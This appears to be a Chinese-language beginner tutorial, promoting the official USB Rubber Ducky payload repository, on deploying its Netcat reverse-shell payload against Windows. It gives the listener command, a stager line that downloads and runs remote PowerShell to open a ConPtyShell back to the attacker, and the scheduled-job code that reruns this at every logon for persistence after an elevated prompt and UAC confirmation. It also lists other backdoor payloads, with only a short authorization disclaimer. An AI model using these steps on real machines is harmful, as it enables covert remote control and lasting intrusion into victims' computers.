
USB Rubber Ducky如何搭建Netcat反弹ShellNetcat-Reverseshell Payload详解【免费下载链接】usbrubberducky-payloadsThe Official USB Rubber Ducky Payload Repository项目地址: https://gitcode.com/GitHub_Trending/us/usbrubberducky-payloads本文将带你一步步了解如何使用USB Rubber Ducky官方 Payload 仓库中的Netcat 反弹ShellNetcat-Reverseshell-On-Log-InPayload实现登录后自动建立远程反向连接。内容涵盖原理说明、服务器端监听搭建、Payload 逐段解析与持久化机制适合刚接触 USB Rubber Ducky 与反弹Shell概念的新手阅读。 先搞懂USB Rubber Ducky 反弹 Shell 是如何工作的USB Rubber Ducky 外观像一枚普通 U 盘但插入电脑后它会被识别为HID 键盘并以超高速打字的方式向目标机器注入一串按键指令DuckyScript™ 脚本。反弹 Shell 的核心思路则是反其道而行之攻击机你的电脑运行 Netcat 监听器等待连接目标机器由 Ducky 注入脚本主动发起连接并回传一个交互式 Shell。由于连接方向是内向外它可以轻松穿越大多数只限制入站流量的防火墙这也是反弹 Shell 最经典的用法。 Netcat-Reverseshell Payload 在哪里找本仓库是官方 USB Rubber Ducky Payload 库所有远程访问类脚本集中在payloads/library/remote_access/目录。本文的主角文件为payload.txtNetcat 反弹ShellWindows 登录触发persistentReverseDucky/payload.txtLinux 持久化反弹Shellsystemd 服务方式ReverseDuckyUltimate/README.md带加密与自动部署的终极版 仓库中的payload.txt都是源码需要用 Hak5 PayloadStudio 编译后写入 Ducky 才能运行详见根目录 README.md。️ 第一步在服务器端搭建 Netcat 监听运行这个 Payload 前攻击机必须满足两个前提Payload 头部的REM注释里有明确要求防火墙放行并监听 87 端口例如nc -l -p 87准备一个可下载的 txt 文件内容为一条 ConPtyShell 命令把 IP 换成你自己的服务器 IPIEX(IWR https://example.com/txt/load.txt -UseBasicParsing); Invoke-ConPtyShell 1.2.3.4 87将其托管在任意可公网访问的位置自己的 Web 服务器即可。下图是监听端环境搭建与运行时的终端效果参考来自同目录 PingZhellDucky 的演示截图 第二步逐段读懂 Netcat-Reverseshell Payload整个 payload.txt 只有短短 20 多行 DuckyScript但结构非常清晰阶段关键指令作用① 打开窗口GUI rSTRING powershellCTRL SHIFT ENTER打开 PowerShell 并以管理员权限运行② 确认 UACDELAYLEFTENTER留出反应时间回车确认管理员权限③ 注册计划任务一行 PowerShell核心见下方创建登录时触发的计划任务④ 收尾STRING exitENTER退出窗口动作不留痕迹核心那一行的逻辑拆开看$T New-JobTrigger -AtLogOn # 触发器每次用户登录 $Script Invoke-WebRequest 你的URL # 从服务器下载第二阶段脚本 $ScriptBlock [Scriptblock]::Create($Script.Content) Register-ScheduledJob -Name Powershell -ScriptBlock $ScriptBlock -Trigger $T也就是说Ducky 并不直接发起连接而是注册一个每次登录都执行的计划任务由该任务去下载并运行 ConPtyShell最终把交互式 Shell 送回你的 87 端口监听器。修改要点把 payload 中的https://example.com/txt/load.txt替换为你实际托管 txt 的原始地址txt 内的 IP 与端口要与监听端一致。作者还在注释里提示DELAY数值可按目标机器速度自行调整或删减。⚙️ 第三步执行流程与持久化机制把 Ducky 插入目标 Windows 电脑Payload 要求关闭 Windows Defender完整链路如下Ducky 模拟键盘弹出管理员 PowerShell 并注册登录触发任务用户下一次登录时计划任务自动执行目标机器下载 ConPtyShell 脚本主动向攻击机IP:87发起连接攻击机nc -l -p 87上收到连接即可输入命令远程控制目标。下图展示了监听端收到目标 Windows PowerShell 反向连接后的实际效果这种登录即触发的设计属于典型的持久化手法即使拔掉 Ducky重启后每次登录连接仍会自动重建排查难度更高。⚠️ 另外注意目标机必须能正常执行远程下载的 PowerShell 脚本。可在测试机上先用Get-ExecutionPolicy查看执行策略相关场景可参考 Starting_a_PowerShell_with_administrator_permissions_in_Windows/docs/1.png 截图所示的管理员 PowerShell 环境检查方式。 延伸阅读仓库里还有哪些远程访问好手如果不想局限于 Netcat 方案payloads/library/remote_access/下还有这些值得研究ReverseDucky 系列ReverseDucky.txt、ReverseDuckyUltimate/payload.txt支持 HTTPS 证书加密传输、多态伪装隐蔽性更强persistentReverseDucky面向 Linux10 秒内创建非 root 的 systemd 用户服务实现持久化反弹PingZhellDucky借助 ICMP 协议传数据可绕过对 TCP 监听的检测win_smb-backdoor / win_winrm-backdoor分别通过 SMB 与 WinRM 建立 Windows 后门。⚠️ 注意事项与免责声明所有操作请仅限在自己的测试环境或已获得明确授权的系统上进行未经授权访问他人电脑属于违法行为该 Payload 要求目标关闭 Windows Defender测试前请确认环境隔离仓库中的脚本均为社区贡献作者不保证其功能与安全性使用前请逐行读懂每一行代码贡献新 Payload 前请先阅读 CONTRIBUTING.md 中的命名规范与分阶段载荷Staged Payloads要求——外部 URL 必须使用example.com占位。掌握 Netcat 反弹 Shell 的原理后你就打通了 USB Rubber Ducky 远程访问类 Payload 的核心逻辑其余脚本只是在此基础上叠加了加密、隧道、持久化等技巧。祝实验顺利【免费下载链接】usbrubberducky-payloadsThe Official USB Rubber Ducky Payload Repository项目地址: https://gitcode.com/GitHub_Trending/us/usbrubberducky-payloads创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考